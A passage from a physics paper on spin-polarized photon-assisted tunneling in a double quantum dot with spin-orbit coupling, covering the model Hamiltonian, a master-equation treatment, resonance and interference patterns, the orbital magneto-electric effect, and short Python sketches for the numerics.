sf}\in\mathds{R}\) (see A). Note that we have not included a Coulomb interaction term as we will focus on the single-particle dynamics. The Hamiltonian above does not explicitly include excited states of the QD confining potential.
However, in combination with the SOC and an ac electric field, the intra-dot dynamics result in the appearance of an effective magnetic field [69], as employed for the manipulation of spin qubits in EDSR protocols. In the present model, this effective magnetic field is contained in \(\hat{H}_{1}(t)\). We derive this term in the context of a Schrieffer-Wolff transformation (SWT) in A.

Figure 1: Schematic picture of a DQD in the x-y plane, connected to unpolarized contacts. Particles can enter through the left lead and exit to the right one with tunneling rates \(\Gamma_{\rm S,L}\) and \(\Gamma_{\rm D,R}\), respectively. A uniform magnetic field is applied pointing in the z-direction. The particle can tunnel between QDs following a spin-conserving path \(\tau_{0}\). Additionally, due to the SOC, a spin-flip tunneling \(\tau_{\rm sf}\) is also present. Finally, an ac electric field is applied to the left gate \(\epsilon_{\rm L}(t)\), which in combination with the SOC gives rise to the OME term \(\beta(t)\) (see text).

Under SOC, inter- and intra-dot dynamics yield distinct contributions to the spin motion [70]. Hence, we will refer to this term as the orbital magneto-electric effect (OME) in order to distinguish it from the similar effective magnetic field that arises due to the inter-dot dynamics of the spin, which we refer to as the tunneling magneto-electric effect (TME). This effect appears as a result of a finite spin-flip tunneling amplitude, and we discuss it in more detail in section 5. The OME is orthogonal to the SOC vector and therefore we consider it along the x-direction. Moreover, for a homogeneous electric field along the axis of the DQD, the OME term is the same in both dots, \(\beta_{\rm L}(t)=\beta_{\rm R}(t)=\beta(t)\). Here, we consider \(\beta(t)=\beta_{\rm SO}\cos(\omega t)\), with \(\beta_{\rm SO}\in\mathds{R}\). Note that the frequency of the OME term is the same as that of \(\epsilon_{L}(t)\), as it arises from the same applied voltage. The static contribution to the electric field produces only a negligible rotation of the spin axis, and we disregard this effect in the following (see A). Finally, we remark that the OME term appears only for \(E_{z}\neq 0\), which is needed to break time-reversal symmetry. In the case where \(E_{z}\) is small, the hyperfine interaction may produce an equivalent effect [69]. The total Hamiltonian, written in the basis \(\{|L\uparrow\rangle,|L\downarrow\rangle,|R\uparrow\rangle,|R\downarrow\rangle\}\), reads
\[\hat{H}=\left(\begin{array}{cccc}\epsilon_{L}(t)+E_{z}/2&\beta(t)/2&-\tau_{0}&-\tau_{\rm sf}\\ \beta(t)/2&\epsilon_{L}(t)-E_{z}/2&\tau_{\rm sf}&-\tau_{0}\\ -\tau_{0}&\tau_{\rm sf}&\epsilon_{R}+E_{z}/2&\beta(t)/2\\ -\tau_{\rm sf}&-\tau_{0}&\beta(t)/2&\epsilon_{R}-E_{z}/2\end{array}\right). \tag{2}\]
We consider the following parameter to characterize the relationship between the spin-conserving and spin-flip tunneling amplitudes
\[\chi\equiv\frac{1}{\tau_{0}/\tau_{\rm sf}+1}, \tag{3}\]
so that \(\chi=0\) corresponds to \(\tau_{\rm sf}=0\), and \(\chi=1\) to \(\tau_{0}=0\). We normalize the tunneling amplitudes so that \(\tau_{0}+\tau_{\rm sf}=\tau\). Most systems exhibit a spin-flip contribution to tunneling that is much smaller than the spin-conserving one [71]. However, an applied external field can be employed to tune the SOC and therefore the spin-flip contribution, e.g., in GaAs-based hole QDs [72, 73]. Spin polarization in the external leads can further produce synthetic SOC in DQDs [74].
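For concreteness, the 4×4 Hamiltonian of Eq. (2), together with the parametrization of Eq. (3), can be assembled numerically as in the short sketch below. This is a minimal illustration in our own notation (function and variable names are not from the paper), and the example parameters loosely follow the values used later in figure 2.

```python
import numpy as np

def dqd_hamiltonian(t, eps_L0, eps_R, eps_ac, omega, E_z, tau, chi, beta_SO):
    """H(t) of Eq. (2) in the basis {|L up>, |L down>, |R up>, |R down>} (hbar = 1).
    chi sets the spin-flip fraction as in Eq. (3), with tau_0 + tau_sf = tau."""
    tau_sf = chi * tau                            # spin-flip tunneling amplitude
    tau_0 = tau - tau_sf                          # spin-conserving tunneling amplitude
    eps_L = eps_L0 + eps_ac * np.cos(omega * t)   # driven left-dot level
    beta = beta_SO * np.cos(omega * t)            # OME term, same frequency as the drive
    return np.array([
        [eps_L + E_z / 2, beta / 2,         -tau_0,           -tau_sf],
        [beta / 2,        eps_L - E_z / 2,   tau_sf,          -tau_0],
        [-tau_0,          tau_sf,            eps_R + E_z / 2,  beta / 2],
        [-tau_sf,        -tau_0,             beta / 2,         eps_R - E_z / 2],
    ])

# Example: units of the driving frequency (omega = 1), weak spin-flip admixture.
H0 = dqd_hamiltonian(t=0.0, eps_L0=0.0, eps_R=0.0, eps_ac=1.2, omega=1.0,
                     E_z=0.25, tau=0.1, chi=0.1, beta_SO=0.125)
assert np.allclose(H0, H0.conj().T)   # Hermitian, as required
```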
Therefore, we investigate arbitrary values of \(\chi\) in the following. Current readout is performed by coupling the QD chain to source (S) and drain (D) leads. The coupling between the leads and the QD chain is given by

\[\hat{H}_{\Gamma}=\sum_{l,\mathbf{k},\sigma,\eta}(\gamma_{l,\eta}\hat{c}^{\dagger}_{l,\mathbf{k},\sigma}\hat{d}_{\eta,\sigma}+h.c.), \tag{4}\]

with \(\hat{c}_{l,\mathbf{k},\sigma}\) the annihilation operator for a particle in the lead \(l=\{S,D\}\), with spin \(\sigma\) and momentum \(\mathbf{k}\). We consider the coupling between the leads and the QD chain to be spin-conserving. We further consider the infinite bias limit, so that transport is unidirectional from source to drain. Additionally, in this limit, all the side-bands couple equally to the source lead. Thus, following the property of the Bessel functions \(\sum_{n}J_{n}(\epsilon_{\rm ac}/\omega)^{2}=1\), we can neglect the effect of the renormalization of \(\gamma_{l,\eta}\) due to the ac electric field [55]. We consider the dynamics of the system via its reduced density matrix \(\hat{\rho}(t)\), which, under a Markovian approximation, satisfies the master equation

\[\frac{d}{dt}\hat{\rho}(t)=-i[\hat{H}(t),\hat{\rho}(t)]+{\cal K}\hat{\rho}(t), \tag{5}\]

where

\[{\cal K}\hat{\rho}=\sum_{\sigma}\left[\Gamma_{\rm S,L}\left(\hat{d}^{\dagger}_{L,\sigma}\hat{\rho}\hat{d}_{L,\sigma}-\frac{1}{2}\left\{\hat{d}_{L,\sigma}\hat{d}^{\dagger}_{L,\sigma},\hat{\rho}\right\}\right)+\Gamma_{\rm D,R}\left(\hat{d}_{R,\sigma}\hat{\rho}\hat{d}^{\dagger}_{R,\sigma}-\frac{1}{2}\left\{\hat{d}^{\dagger}_{R,\sigma}\hat{d}_{R,\sigma},\hat{\rho}\right\}\right)\right], \tag{6}\]

is the kernel superoperator for weak coupling in the infinite bias approximation. Transition rates due to the coupling with the leads are defined as \(\Gamma_{l,\eta}=2\pi|\gamma_{l,\eta}|^{2}D_{l}(\epsilon_{F})\), where \(D_{l}(\epsilon)\) is the density of states of the lead \(l\) and \(\epsilon_{F}\) is the Fermi energy. We consider the case of strongly interacting QDs, where the energy difference between the single- and double-occupied states is much larger than the rest of the energy scales of the system, allowing us to investigate charge transport in the single-charge sector of the stability diagram. The steady-state current can then be calculated as

\[I^{\infty}=e\sum_{\sigma}\Gamma_{\rm D,R}\rho^{\infty}_{\rm R\sigma}, \tag{7}\]

where

\[\rho^{\infty}_{\rm R\sigma}=\lim_{t\rightarrow\infty}\frac{1}{T}\int_{t}^{t+T}ds\,\langle{\rm R}\sigma|\hat{\rho}(s)|{\rm R}\sigma\rangle, \tag{8}\]

is the occupation of the rightmost dot with spin \(\sigma\) in the stationary state averaged over one period \(T=2\pi/\omega\) of the ac voltage. In the following, we consider an identical coupling to both leads, so that \(\Gamma_{\rm S,L}=\Gamma_{\rm D,R}=\Gamma\).

## 3 Quantum transport in DQD with spin-orbit interaction

In the case where \(E_{z}\sim 0\), quantum transport occurs only close to zero detuning \(\delta\equiv\epsilon_{R,0}-\epsilon_{L,0}=0\), where the levels of the two dots are aligned. The presence of an ac field changes this picture by allowing for PAT in which the particle can tunnel from one dot to the other one by absorbing or emitting a certain number of photons. Then, an \(n-\)photon resonance occurs for \(\delta=n\omega,\ n\in\mathds{Z}\). For \(E_{z}\neq 0\), the degeneracy of the spin doublets is broken, resulting in a current that will generally be spin polarized. 
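Equations (2) and (5)-(8) define the full transport calculation. As a minimal numerical sketch (ours, not the authors'), one can propagate the master equation in the empty-plus-single-particle subspace relevant in the infinite-bias, strong-interaction limit, taking the dissipator of equation (6) in the standard Lindblad form \(\dot{\hat{\rho}}=-i[\hat{H},\hat{\rho}]+\mathcal{K}\hat{\rho}\); all parameter values below are illustrative:

```python
import numpy as np
from scipy.integrate import solve_ivp

# Illustrative parameters (our choice, loosely following the scales quoted for figure 2):
omega = 1.0                         # drive frequency sets the energy unit
tau, chi, Gamma = 0.1, 0.1, 0.01
E_z, eps_ac, beta_SO = 0.25, 1.2, 0.125
tau_sf, tau_0 = chi * tau, (1 - chi) * tau

def hamiltonian(t, delta):
    """Eq. (2) embedded in the basis {|0>, |L up>, |L down>, |R up>, |R down>};
    the empty state |0> is not coupled coherently."""
    eps_L = -delta / 2 + eps_ac * np.cos(omega * t)
    eps_R = +delta / 2
    beta = beta_SO * np.cos(omega * t)
    h = np.zeros((5, 5), dtype=complex)
    h[1:, 1:] = [[eps_L + E_z / 2, beta / 2, -tau_0, -tau_sf],
                 [beta / 2, eps_L - E_z / 2, tau_sf, -tau_0],
                 [-tau_0, tau_sf, eps_R + E_z / 2, beta / 2],
                 [-tau_sf, -tau_0, beta / 2, eps_R - E_z / 2]]
    return h

def basis(i):
    v = np.zeros(5)
    v[i] = 1.0
    return v

# Jump operators of eq. (6): the source fills |L,sigma>, the drain empties |R,sigma>.
jumps = [np.sqrt(Gamma) * np.outer(basis(i), basis(0)) for i in (1, 2)]
jumps += [np.sqrt(Gamma) * np.outer(basis(0), basis(i)) for i in (3, 4)]

def rhs(t, y, delta):
    # real and imaginary parts of rho are stacked to keep the ODE real-valued
    rho = (y[:25] + 1j * y[25:]).reshape(5, 5)
    h = hamiltonian(t, delta)
    drho = -1j * (h @ rho - rho @ h)
    for L in jumps:   # standard Lindblad dissipator
        drho += L @ rho @ L.conj().T - 0.5 * (L.conj().T @ L @ rho + rho @ L.conj().T @ L)
    return np.concatenate([drho.real.ravel(), drho.imag.ravel()])

def averaged_current(delta, n_transient=300, n_avg=20):
    """Time-averaged current of eqs. (7)-(8), I = e*Gamma*sum_sigma rho_R,sigma (e = 1)."""
    T = 2 * np.pi / omega
    rho0 = np.zeros((5, 5))
    rho0[0, 0] = 1.0
    y0 = np.concatenate([rho0.ravel(), np.zeros(25)])
    t_avg = np.linspace(n_transient * T, (n_transient + n_avg) * T, 500)
    sol = solve_ivp(rhs, (0.0, t_avg[-1]), y0, args=(delta,), t_eval=t_avg,
                    rtol=1e-7, atol=1e-9)
    occ_R = sol.y[3 * 5 + 3] + sol.y[4 * 5 + 4]   # Re(rho[3,3] + rho[4,4])
    return Gamma * occ_R.mean()

print(averaged_current(delta=0.25))   # e.g. at the direct spin-flip resonance delta = E_z
```

Scanning `delta` and `E_z` with a routine of this kind is how maps analogous to figure 2(a) can be generated.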
Then, we can distinguish several processes, schematized in figure 2. First, spin-conserving resonances with either no photons (process 1), also known as direct resonance, or with the emission/absorption of a photon (process 4). As in the case without a magnetic field, these occur at \(\delta=n\omega\), in which the particle can tunnel directly from one dot to the other. These resonances survive the presence of a magnetic field, since the difference in energy between one particle with the same spin in different dots is also \(\delta\). Moreover, since the levels are now split in spin by the magnetic field, there can also be resonances when the states with opposite spin have the same energy, which is enabled by the presence of a spin-flip component in the tunneling amplitudes. This will occur whenever \(\delta=\pm E_{z}\), as represented in figure 2 (process 2). Moreover, in the presence of an ac bias, these resonances are accompanied by a set of replicas due to PAT. This is process 3 in figure 2. As a result, when the current is represented as a function of \(\delta\) and \(E_{z}\) as in figure 2(a), we find both the usual resonances at \(\delta=n\omega\) and a set of spin-flip resonances along the lines

\[\delta+n\omega=\pm E_{z}. \tag{9}\]

In the \(\delta-E_{z}\) representation of figure 2(a), these correspond _mostly_ to diagonal lines.

Figure 2: (a) Current through a DQD as a function of \(\delta\) and \(E_{z}\) for \(\chi=0.1\) and \(\beta_{\mathrm{SO}}=E_{z}/2\). Highlighted in the figure, there is a set of four characteristic processes numbered \(1-4\). Process 1 corresponds to direct spin-conserving PAT through the two spin channels at \(\delta=0\). Process 2 corresponds to direct spin-flip PAT. Process 3 corresponds to spin-flip PAT involving one photon. Process 4 corresponds to spin-conserving PAT involving one photon through the two spin channels at \(\delta=\omega\). All four processes are schematically represented on the left side of the figure. (b) A set of cuts in panel (a) at different values of \(E_{z}\), with a small offset of the \(y\)-axis for clarity. (c) Spin polarization of the current as a function of \(\delta\) and \(E_{z}\). (d) Spin polarization (solid black, left axis) and total current (dashed red, right axis) for \(E_{z}=0.25\omega\) as a function of \(\delta\), represented by the horizontal cut in panel (c). In regions around \(\delta=\pm 0.5\omega\), the current can be switched directly from one polarization to the opposite one with comparable intensity. Other parameters are \(\omega=10\tau=100\Gamma\), and \(\epsilon_{\mathrm{ac}}=1.2\omega\).

Note that transport at these resonances is not blocked when a particle tunnels from the source into the left dot in a spin state that is not energy-aligned with any state on the right dot (such as \(|L\downarrow\rangle\) in process 2 of figure 2). Due to the finite spin-flip tunneling amplitude, the spin states always have a small component of the opposite spin. Another way to see this is that the spin rotates as a result of virtual tunneling to the other dot via the aforementioned TME until it aligns with the resonance. However, there are several points where this simple picture breaks down. In the vicinity of a PAT process with \(n\) photons the states in the two dots are strongly hybridized with energies

\[E_{\pm}=\delta\pm\tau J_{n}\left(\frac{\epsilon_{\rm ac}}{\omega}\right), \tag{10}\]

for the two molecular states, where \(J_{n}(z)\) is the \(n\)th-order Bessel function. 
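The resonance structure just described is easy to tabulate numerically. A small sketch (our notation; parameter values are illustrative) listing the bare spin-flip resonance positions of equation (9) and the hybridized molecular energies of equation (10):

```python
import numpy as np
from scipy.special import jv

omega, tau, eps_ac = 1.0, 0.1, 1.2   # illustrative values, energies in units of omega

def spin_flip_resonances(E_z, n_max=2):
    """Bare spin-flip resonance positions of eq. (9): delta = -n*omega +/- E_z."""
    return sorted(-n * omega + s * E_z for n in range(-n_max, n_max + 1) for s in (+1, -1))

def molecular_energies(delta, n):
    """Hybridized energies of eq. (10) near an n-photon resonance."""
    shift = tau * jv(n, eps_ac / omega)
    return delta + shift, delta - shift

print(spin_flip_resonances(E_z=0.25))
print(molecular_energies(delta=0.0, n=1))
```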
There, the diagonal lines are no longer straight but curve at \(E_{z}\approx\pm\tau\), corresponding to the resonance conditions with the energies given by equation (10). This is clearly seen in figure 2(a) in the PAT resonances near \(E_{z}=0\). The overall shape of these resonances closely follows hyperbolas in the \(\delta-E_{z}\) representation shown there. Another departure from this simple picture occurs near \(E_{z}=\pm\omega\), where the OME field induces resonant transitions between the two spin states. There, the spin-flip resonances do not cross the spin-conserving PAT resonances at \(\delta=\pm\omega\). Instead, the spin-flip resonant lines are _repelled_ so that a current-free gap opens between the main resonances (1) and the spin-flip resonances (2). Moreover, we see another effect on the current at the main resonances at \(\delta=0\). There, the spin-flip resonances cross the main resonances at \(E_{z}=\pm(\tau+\beta_{\rm SO})\) instead of simply crossing at \(E_{z}=\pm\tau\), as discussed above. The spin-flip resonances are then still hyperbolas but vertically displaced from where they would be for \(\beta_{\rm SO}=0\). Finally, when photo-assisted spin-flip resonances with zero or one photon meet, they do not get distorted (such as at \(\delta=\pm\omega/2\), \(E_{z}=\pm\omega/2\) in figure 2(a)) as they correspond to processes that transmit different spin polarizations. The spin polarization of the current is defined as \[P_{\sigma}=\frac{I_{\uparrow}^{\infty}-I_{\downarrow}^{\infty}}{I_{\uparrow}^{ \infty}+I_{\downarrow}^{\infty}}, \tag{11}\] where \(I_{\sigma}^{\infty}=e\Gamma\rho_{{\rm R},\sigma}^{\infty}\). We have represented \(P_{\sigma}\) as a function of \(\delta\) and \(E_{z}\) in figure 2(c). As expected, the spin polarization is non-zero at the spin-flip current branches, provided that only one path is active (either \(|L\uparrow\rangle\rightarrow|R\downarrow\rangle\) or \(|L\downarrow\rangle\rightarrow|R\uparrow\rangle\)). We are able to obtain spin polarization close to 1, with the largest limitation in this setup being the overlap of a spin-flip resonance with a spin-conserving PAT resonance. The width of spin-conserving resonances can be tuned by reducing \(\tau_{0}\), and the separation between PATs can be increased by varying the ac voltage frequency \(\omega\). This setup allows for several ways of controlling spin polarization. In figure 2(d), we show the polarization together with the total current. By varying \(\delta\) from \(\delta\simeq 0.2\omega\) to \(\delta\simeq 0.8\omega\), we are able to shift from a direct PAT resonance with a strong spin polarization in one direction to a one-photon PAT resonance with a strong spin polarization in the opposite one. Hence, polarization can be inverted without crossing the resonance at \(\delta=0\). Since \(\delta\) is often one of the easiest parameters to control in experimental setups, this allows us to generate highly tunable fully spin-polarized currents. This is remarkable, since the spin-flip amplitude in this case has been considered very small (\(\chi=0.1\)). With a correct tuning of \(\chi\) and \(\tau\) (reducing the width of the spin-conserving resonances), the spin polarization can be adjusted to an even larger degree. We note a slight asymmetry in the spin polarization in the two adjacent highly polarized peaks at \(\delta\simeq 0.2\omega\) and \(\delta\simeq 0.8\omega\) resulting from the OME term. 
This can be seen in figure 2(c), where the resonance lines have different widths depending on whether they cross the \(E_{z}=\pm\omega\), \(\delta=\pm\omega\) points or not. For \(\beta_{\mathrm{SO}}\to 0\), the current associated with the two resonances has the same absolute value of polarization (and is close to \(P_{\sigma}=\pm 1\), respectively). By tuning the frequency of the ac voltage, the setup allows another mode of generating spin-polarized currents. The DQD can be initialized in a configuration in which direct resonances without photons are energetically disfavored. Then, applying a voltage with the frequency tuned to either the spin-conserving or the spin-flip resonance with absorption or emission of photons, the resulting current will be spin-polarized in one direction or the other, depending on the spin of the initial state. Both modes of operation allow for fully electric control of the spin polarization of the current without the need to modify the magnetic fields, which enables fast control of the current under experimental conditions.

Next, we study the effect of varying the amplitude of the ac voltage. Due to Landau-Zener-Stückelberg (LZS) interferences, if the QDs are in resonance \(\delta=n\omega\), photo-assisted transitions can be understood to occur with a tunneling amplitude renormalized by a Bessel function as [58, 59, 75]

\[\tau_{\zeta}\rightarrow\tau_{\zeta}J_{n}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right),\quad\zeta\in\{0,\mathrm{sf}\}. \tag{12}\]

Crucially, both the spin-conserving and spin-flip amplitudes are equally modified by the presence of the ac field. This well-known expression holds except at the points where the spin levels are in resonance as well (\(E_{z}=m\omega\)), as we will see in the next sections. At the zeros of any given Bessel function, destructive interference occurs, and both spin-conserving and spin-flip tunneling rates are suppressed. This effect is known as coherent destruction of tunneling (CDT) [49]. The resulting pattern is given in figure 3(a), where we have represented the current as a function of both \(\delta\) and \(\epsilon_{\mathrm{ac}}\), for a range that includes the first five photo-assisted resonances in each direction of \(\delta\), plus the resonance at \(\delta=0\). Spin-flip resonances are visible as thinner parallel lines along the \(\epsilon_{\mathrm{ac}}\) axis, two to each side of the main resonances. We have also represented in figure 3(a) (bottom panel) a set of cuts at \(\epsilon_{\mathrm{ac}}=0\) (green), \(\epsilon_{\mathrm{ac}}=3\omega\) (blue) and \(\epsilon_{\mathrm{ac}}=6\omega\) (red), showing the resonance pattern (similarly to figure 2). Furthermore, figure 3(a) (left panel) shows the interference pattern that leads to CDT. Here, we have represented a set of cuts at values of \(\delta=n\omega\) for \(n=0\) (pink), \(n=1\) (lime) and \(n=2\) (cyan). We also include dashed lines to denote the first zeros of \(J_{n}(\epsilon_{\mathrm{ac}}/\omega)\), which coincide precisely with the dips in the current at \(\delta=n\omega\). Finally, in figure 3(b) we plot the spin polarization for the LZS interferometry. The main spin-conserving resonances have an unpolarized spin current \(P_{\sigma}\sim 0\), since both the spin-up and spin-down channels are present with the same probability. However, spin-flip resonances at \(\delta=n\omega\pm E_{z}\) are highly spin polarized \(P_{\sigma}\sim\pm 1\), as already mentioned above. 
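The CDT condition can be located directly from the Bessel zeros entering equation (12). A short sketch (ours; `scipy.special.jn_zeros` returns the zeros of the integer-order Bessel functions \(J_{n}\), and the working point chosen for the renormalized amplitudes is illustrative):

```python
import numpy as np
from scipy.special import jn_zeros, jv

# Drive amplitudes (in units of omega) at which the n-photon resonance
# delta = n*omega is suppressed by CDT, i.e. the zeros of J_n in eq. (12):
for n in range(3):
    print(f"n = {n}: eps_ac/omega at CDT =", np.round(jn_zeros(n, 2), 3))
# The n = 0 resonance is suppressed near eps_ac ~ 2.40*omega, matching the
# dips of the current discussed for the left panel of figure 3(a).

# Renormalized tunneling amplitudes at a chosen working point:
eps_ac, omega, tau, chi, n = 3.0, 1.0, 0.1, 0.2, 1
tau_sf, tau_0 = chi * tau, (1 - chi) * tau
print("tau_0  ->", tau_0 * jv(n, eps_ac / omega))
print("tau_sf ->", tau_sf * jv(n, eps_ac / omega))
```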
These resonances, similar to the spin-conserving ones, also exhibit a CDT effect where \(J_{n}(\epsilon_{\rm ac}/\omega)=0\).

Figure 3: (a) Current and (b) spin polarization through a DQD as a function of \(\delta\) and \(\epsilon_{\rm ac}\). (a, bottom) Cuts along the horizontal axis at \(\epsilon_{\rm ac}=0\) (green), \(\epsilon_{\rm ac}=3\omega\) (blue), and \(\epsilon_{\rm ac}=6\omega\) (red), showing the appearance of satellite peaks close to the main resonances for \(\epsilon_{\rm ac}\neq 0\). (a, left) Cuts along the vertical axis (dashed lines) at \(\delta=n\omega\) with \(n=0\) (pink), \(n=1\) (lime), and \(n=2\) (cyan), showing the appearance of coherent destruction of tunneling, where the current drops to zero. The horizontal solid lines denote the zeros of the Bessel function \(J_{n}(\epsilon_{\rm ac}/\omega)\). The parameters used are \(\omega=10\tau=100\Gamma\), \(E_{z}=0.3\omega\), \(\beta_{\rm SO}=0\), and \(\chi=0.2\).

### Effect of the OME

In this section, we consider in detail the effect of the OME term. This will be, in general, a weak effect because the amplitude of the SOC-induced OME field is smaller than the electric voltage amplitude. However, as anticipated above, the OME has a strong effect near the spin resonances at \(E_{z}\simeq n\omega\). At these points, the effective ac magnetic field can induce resonant transitions between the two spin states on the same QD. To focus on this regime, let us consider the Hamiltonian at any such resonance. We perform the following unitary transformation

\[\hat{U}(t)=\exp\left(\frac{-in\omega t\hat{\sigma}_{z}}{2}\right)\exp\left(\frac{-i\epsilon_{\rm ac}\sin(\omega t)(1+\hat{\tau}_{z})}{2\omega}\right), \tag{13}\]

where \(\hat{\tau}_{i}\) are Pauli matrices associated with the charge (left/right dot) degree of freedom. The leftmost operator transforms the system into the rotating frame at the spin resonance. The rightmost operator transforms into the interaction picture with respect to the ac voltage, removing the corresponding term from the Hamiltonian at the cost of turning the tunneling time-dependent. Its purpose is to allow for arbitrary ac voltage amplitudes within a rotating-wave approximation (RWA) [60], under which we will work. When the transformation of equation (13) is performed and the Jacobi-Anger expansion is employed, the terms in the Hamiltonian are changed as

\[\langle\eta\sigma|\hat{H}_{0}|\eta\sigma\rangle=E_{z}\to E_{z}-n\omega, \tag{14a}\]
\[\langle\mathrm{R}\sigma|\hat{H}_{0}|\mathrm{L}\sigma\rangle=\tau_{0}\to\tau_{0}\sum_{k=-\infty}^{\infty}J_{k}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right)e^{ik\omega t}, \tag{14b}\]
\[\langle\mathrm{R}\uparrow(\downarrow)|\hat{H}_{0}|\mathrm{L}\downarrow(\uparrow)\rangle=\pm\tau_{\mathrm{sf}}\to\pm\tau_{\mathrm{sf}}\sum_{k=-\infty}^{\infty}J_{k}\left(\frac{\epsilon_{\mathrm{ac}}}{\omega}\right)e^{i(k\mp n)\omega t}, \tag{14c}\]
\[\langle\eta\uparrow|\hat{H}_{1}|\eta\downarrow\rangle=\beta\left(t\right)\to\frac{\beta_{\mathrm{SO}}}{2}\left(e^{i(n+1)\omega t}+e^{i(n-1)\omega t}\right). \tag{14d}\]

Other terms are obtained by imposing Hermiticity on the effective Hamiltonian. Let us now consider the avoided crossing at \(\delta\approx 0\), \(n=1\), visible in figure 2 (the resonance \(n=-1\) follows a similar behavior). We now apply the RWA, neglecting the time-dependent terms. 
This yields \[\hat{H}_{\mathrm{RWA}}=\left(\begin{array}{cccc}-\delta/2&\beta_{\mathrm{ SO}}/4&-\tau_{0}^{\mathrm{RWA}}&-\tau_{\mathrm{sf}}^{\mathrm{RWA}}\\ \beta_{\mathrm{SO}}/4&-\delta/2&-\tau_{\mathrm{sf}}^{\mathrm{RWA}}&-\tau_{0}^ {\mathrm{RWA}}\\ -\tau_{0}^{\mathrm{RWA}}&-\tau_{\mathrm{sf}}^{\mathrm{RWA}}&\delta/2&\beta_{ \mathrm{SO}}/4\\ -\tau_{\mathrm{sf}}^{\mathrm{RWA}}&-\tau_{0}^{\mathrm{RWA}}&\beta_{\mathrm{SO }}/4&\delta/2\end{array}\right), \tag{15}\] where \(\tau_{0}^{\mathrm{RWA}}=\tau_{0}J_{0}(\epsilon_{\mathrm{ac}}/\omega)\) and \(\tau_{\mathrm{sf}}^{\mathrm{RWA}}=\tau_{\mathrm{sf}}J_{1}(\epsilon_{\mathrm{ ac}}/\omega)\). Note that at the resonance between the two spin levels, the spin-conserving tunneling amplitude is renormalized by \(J_{0}(z)\) while the spin-flip amplitude is renormalized by \(J_{1}(z)\), with \(z=\epsilon_{\mathrm{ac}}/\omega\). In this frame, the OME term acts as a constant magnetic field, resulting in a splitting \(\beta_{\mathrm{SO}}/2\) of the spins in the x-direction. The avoided crossing between the spin-conserving and spin-flip resonances discussed above can be understood in this picture as the OME term producing a splitting between the spins that is only strong near the EDSR. Therefore, resonant transport occurs now when \(\delta=\pm\beta_{\mathrm{SO}}/2\). These new resonances are visible in figure 4(a) as side peaks next to the main resonance at \(\delta=0\). Note that the position of the resonances shows a linear relationship between detuning and \(\beta_{\mathrm{SO}}\), as expected. However, around \(\beta_{\mathrm{SO}}\lesssim\tau\) the hybridization between states is large enough to distort this simple picture (in the same way as for equation (10)). The previous results are valid provided that \(\beta_{\mathrm{SO}}/\omega\ll 1\), as required by the RWA. We can further relax this condition by performing the transformation \[\hat{U}^{\prime}(t)=\exp\left(\frac{-i\beta_{\mathrm{SO}}\sin\left(\omega t \right)\hat{\sigma}_{x}}{2\omega}\right) \tag{16}\] to the original Hamiltonian in equation (2), and then apply \(\hat{U}(t)\) given in equation (13). This transformation removes \(\hat{H}_{1}(t)\) (the OME term) at the cost of transforming the spin-flip and Zeeman splitting terms as \[\frac{E_{z}}{2}\hat{\sigma}_{z}\rightarrow \frac{E_{z}}{2}\cos\left[\frac{\beta_{\mathrm{SO}}}{\omega}\sin \left(\omega t\right)\right]\hat{\sigma}_{z} \tag{17a}\] \[+\frac{E_{z}}{2}\sin\left[\frac{\beta_{\mathrm{SO}}}{\omega}\sin \left(\omega t\right)\right]\hat{\sigma}_{y},\] \[\tau_{\mathrm{sf}}\hat{\tau}_{y}\hat{\sigma}_{y}\rightarrow \tau_{\mathrm{sf}}\hat{\tau}_{y}\cos\left[\frac{\beta_{\mathrm{SO }}}{\omega}\sin\left(\omega t\right)\right]\hat{\sigma}_{y}\] \[-\tau_{\mathrm{sf}}\hat{\tau}_{y}\sin\left[\frac{\beta_{\mathrm{ SO}}}{\omega}\sin\left(\omega t\right)\right]\hat{\sigma}_{z}. \tag{17b}\] The first term on the right-hand side of the expression for \(E_{z}\) reflects the renormalization effect due to the ac magnetic field. Compared to equation (15), this term renormalizes the Zeeman splitting by a factor \(J_{0}(\beta_{\mathrm{SO}}/\omega)\). At destructive interferences where \(J_{0}\left(\beta_{\mathrm{SO}}/\omega\right)=0\), the Zeeman splitting is completely suppressed in a process known as spin locking (SL) [51]. Nonetheless, this suppression occurs for values of \(\beta_{\mathrm{SO}}\) beyond those discussed in A. In general, the main effect of this renormalization is that EDSR now occurs at \(E_{z}J_{0}(\beta_{\mathrm{SO}}/\omega)=n\omega\). 
The second term on the expression for \(E_{z}\) reduces for \(\beta_{\mathrm{SO}}/\omega\ll 1\) to the (phase-shifted) OME term. At resonance \(n=\pm 1\), this corresponds to the substitution

\[\frac{\beta_{\mathrm{SO}}}{2}\to E_{z}J_{1}\left(\frac{\beta_{\mathrm{SO}}}{\omega}\right), \tag{18}\]

e.g., in equation (15). In the limit \(\beta_{\mathrm{SO}}/\omega\ll 1\) we recover the result of the previous section, while for \(J_{1}\left(\beta_{\mathrm{SO}}/\omega\right)=0\) the effective magnetic field is suppressed in a similar way to the case discussed above where spin locking takes place. Again, this effect occurs for parameters beyond the scope of the approximations of A and we do not consider it any further.

Figure 4: (a) Current through a DQD as a function of \(\delta\) and \(\beta_{\mathrm{SO}}\). A cut along the horizontal axis at \(\beta_{\mathrm{SO}}=0.4\omega\) is shown in panel (b). The black solid line is obtained with the original Hamiltonian (equation (2)), while the red dashed line is obtained by the effective Hamiltonian (equation (24)). Two satellite peaks are located at \(\delta\simeq\pm\beta_{\mathrm{SO}}/2\), marked with the blue square and red diamond symbols. The energy levels in these situations, for the effective Hamiltonian, are shown schematically on the right side of the figure. Here, the width of the arrows denotes the tunneling amplitudes for each possible path, while the gray arrows represent tunneling paths that are less favorable. In all panels, \(E_{z}=\omega\), \(\epsilon_{\mathrm{ac}}=1.2\omega\), \(\omega=10\tau=100\Gamma\), and \(\chi=0.2\).

Regarding the transformed spin-flip term, given in equation (17b), it may seem that the first term would also produce a similar Bessel function renormalization. However, the spin-flip amplitude at an arbitrary \(\beta_{\mathrm{SO}}\) allows sidebands to be generated from both the ac voltage and the OME term. The combination of these sidebands yields a more complicated expression. After applying the transformation of equation (13) and expanding the first term of equation (17b) using the Jacobi-Anger expansion, we find the following:

